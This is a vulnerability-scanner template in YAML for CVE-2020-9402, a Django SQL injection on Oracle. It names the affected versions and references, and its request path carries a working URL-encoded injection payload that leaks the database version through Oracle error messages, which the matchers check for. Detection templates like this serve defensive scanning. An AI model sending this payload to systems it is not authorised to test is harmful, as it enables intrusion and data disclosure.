27 lines
1.0 KiB
YAML
27 lines
1.0 KiB
YAML
|
id: CVE-2020-9402
|
||
|
|
||
|
info:
|
||
|
name: Django SQL Injection
|
||
|
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
|
||
|
reference: |
|
||
|
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
|
||
|
- https://docs.djangoproject.com/en/3.0/releases/security/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-9402
|
||
|
author: geeknik
|
||
|
severity: high
|
||
|
tags: cve,cve2020,django,sqli
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"
|
||
|
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "DatabaseError at"
|
||
|
- "ORA-29257:"
|
||
|
- "ORA-06512:"
|
||
|
- "Request Method:"
|
||
|
condition: and
|